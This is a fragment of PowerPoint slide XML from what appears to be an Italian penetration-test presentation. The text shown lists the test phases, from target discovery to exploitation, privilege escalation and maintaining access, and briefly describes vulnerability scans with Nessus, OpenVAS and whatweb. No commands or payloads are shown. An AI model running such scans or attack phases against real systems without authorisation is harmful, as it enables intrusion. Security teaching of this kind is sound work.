            <a:ext cx="3930417" cy="2479772"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Prima parte </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28155A9F-0DD1-7CEF-CF9D-ADEFE03ECA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106340" y="824012"/>
            <a:ext cx="6382411" cy="5201663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114619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Right Triangle 78">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B045E79B-43B0-9A0F-031A-B6324439AAEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="722903"/>
            <a:ext cx="3930417" cy="2479772"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Seconda parte</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3" descr="Immagine che contiene testo, schermata, menu&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C09F772F-23EE-BC43-0BD1-2A2CF03F790E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5260848" y="714591"/>
            <a:ext cx="6073394" cy="5420505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424817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7" name="Group 16">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Right Triangle 49">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err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping</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cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>NESSUS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Andiamo ora ad effettuare il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Mapping sia automatico che manuale. Cominciamo con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Procederemo ad eseguire una scansione dettagliata.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990960B9-DEC1-3C5E-7C63-5F8E0B80C402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1619964"/>
            <a:ext cx="6401443" cy="3632819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68050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ight Triangle 77">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2904"/>
            <a:ext cx="5408713" cy="1410378"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600"/>
              <a:t>Vulnerability mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1E5254-A766-1B9C-7D82-6DEA839EA031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2618379" y="2340144"/>
            <a:ext cx="6443579" cy="3801712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1320098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ight Triangle 77">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2904"/>
            <a:ext cx="5408713" cy="1410378"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4600"/>
              <a:t>Vulnerability mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, Software multimediale&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6144D51-B89D-F49A-9469-EA07C2287B5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838367" y="2340144"/>
            <a:ext cx="8003602" cy="3801712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362680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3" name="Freeform: Shape 15">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48">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5408027" cy="1442463"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping</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340131"/>
            <a:ext cx="4424633" cy="3791918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OPENVAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Analogamente a come fatto con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> procediamo con l’analisi delle vulnerabilità anche con questo altro tool.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>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81E1AB47-3129-A593-2367-B5C1E993E441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087094" y="2117248"/>
            <a:ext cx="4401655" cy="2629989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838685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45" name="Freeform: Shape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7170E1-C163-4577-A0CE-588797377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2903"/>
            <a:ext cx="5917717" cy="1615977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Vulnerability mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, schermo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2521F03-7E93-197D-9DA0-7F66E399511F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048659" y="2847874"/>
            <a:ext cx="5583018" cy="3293981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21203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45" name="Freeform: Shape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7170E1-C163-4577-A0CE-588797377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403531" y="377846"/>
            <a:ext cx="5917717" cy="1615977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Vulnerability mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, Icona del computer&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5134DC48-006B-C58E-E3AE-68841F70AB5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="4899" r="4960" b="5190"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240460" y="2001873"/>
            <a:ext cx="8707750" cy="4700542"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3290382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45" name="Freeform: Shape 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A7170E1-C163-4577-A0CE-588797377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2903"/>
            <a:ext cx="5917717" cy="1615977"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Vulnerability mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2" descr="Immagine che contiene testo, schermata, software, numero&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8D3521-1132-8299-61C7-A8FC57BED0E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159743" y="2847874"/>
            <a:ext cx="7360851" cy="3293981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4205876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39DD77B8-C088-DF82-84D7-B82AD33944BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725952"/>
            <a:ext cx="5818396" cy="1362156"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Indice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CDE9E45-5FEB-CD34-3ADA-B5DC65EFBC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="2340131"/>
            <a:ext cx="5818396" cy="3791918"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Metodologia e strumenti utilizzati</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Informazioni preliminari</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Target Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target e Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Target Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Priviledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Maintaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Portatile sicuro">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18644B7B-0352-395F-6A1B-7F9CFBFED0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154641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 name="Group 15">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r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> mapping</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601193" y="703245"/>
            <a:ext cx="5431498" cy="1940921"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" cap="all">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WHATEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Andiamo ora ad analizzare quali framework e tecnologie sono stati utilizzati per creare la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>WebApp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ciò sarà fatto con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>whatweb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Con questa semplice scansione possiamo già individuare alcuni servizi e specifiche come il fatto che è in esecuzione un servizio in Python.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F284895-5598-9D8A-8A2D-5A59C94DF82A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="691078" y="3647095"/>
            <a:ext cx="10341613" cy="1732219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146423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721946"/>
            <a:ext cx="10611627" cy="1990906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
